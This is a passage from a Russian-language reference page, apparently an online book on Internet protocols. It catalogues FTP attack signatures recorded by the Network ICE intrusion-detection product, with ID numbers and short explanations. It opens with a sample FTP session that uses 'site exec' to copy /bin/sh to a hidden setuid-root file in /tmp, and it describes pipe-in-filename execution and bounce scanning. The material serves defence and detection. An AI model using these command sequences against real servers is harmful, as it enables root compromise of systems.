Протоколы Internet


Список видов атак, зарегистрированных Network ICE - часть 17


220 example.com FTP server (Version wu-2.1(1) ready.

Name (example.com:robert): robert

331 Password required for robert.

Password: foobar

230 User robert logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> quote "site exec cp /bin/sh /tmp/.runme"

200-cp /bin/sh /tmp/runme

ftp> quote "site exec chmod 6755 /tmp/.runme"

200-chmod 6755 /tmp/runme

ftp> quit

221 Goodbye.

Теперь пользователь авторизован и может работать с shell на уровне привилегий root в каталоге /tmp.

2001306

FTP USER name overflow.

2001307

FTP password overflow.

2001308

FTP CWD directory overflow.

2001309

FTP file name overflow.

2001310

FTP command line overflow.

2001311

FTP pipe in filename. Совершена попытка исполнить программу на FTP-сервере. Допускающее это ошибка имеется во многих FTP-демонах около 1997, таких что, если перед именем файла присутствует символ PIPE (|), сервер пытается исполнить программу имя которой следует за ним. Так как FTP-сервер обычно работает с привилегией root, может произойти его компрометация. Проверьте, что у вас работает новейшая версия сервера.

2001312

FTP MKD directory overflow.

2001313

ProFTPD snprintf exploit.

2001314

FTP SITE PSWD exploit.

2001315

FTP compress exec exploit.

2001316

FTP file exec exploit.

2001317

FTP command too long.

2001318

FTP data too long.

2001319

FTP NLST directory overflow.

2001320

FTP SITE ZIPCHK metacharacters.

2001321

FTP SITE ZIPCHK buffer overflow.

2001322

FTP SITE EXEC exploit.

2001323

FTP PrivilegedBounce. Кто-то пытается нарушить безопасность FTP-сервиса, чтобы сканировать другие ЭВМ. Если атака FTP используется при одновременной спецификации привилегированного порта, можете не сомневаться - это сетевая атака. Возможно, что FTP-переадресация на непривилегированный порт является результатом FTP-прокси. По этой причине комбинированная атака рассматривается как отдельная сигнатура. Это позволяет атакеру маскировать свою сетевую идентичность. Возможно также, что атакер, используя эту технику, может обойти некоторые плохо конфигурированные фильтры пакетов или firewalls. Например, если ваш mail-сервер допускает соединения посредством telnet с вашим внутренним FTP-сервером, а с внешними ЭВМ из Internet не допускает, атакер сможет соединиться с вашим telnet-портом на вашем SMTP методом переадресации через ваш FTP-сервер.




Начало  Назад  Вперед



Книжный магазин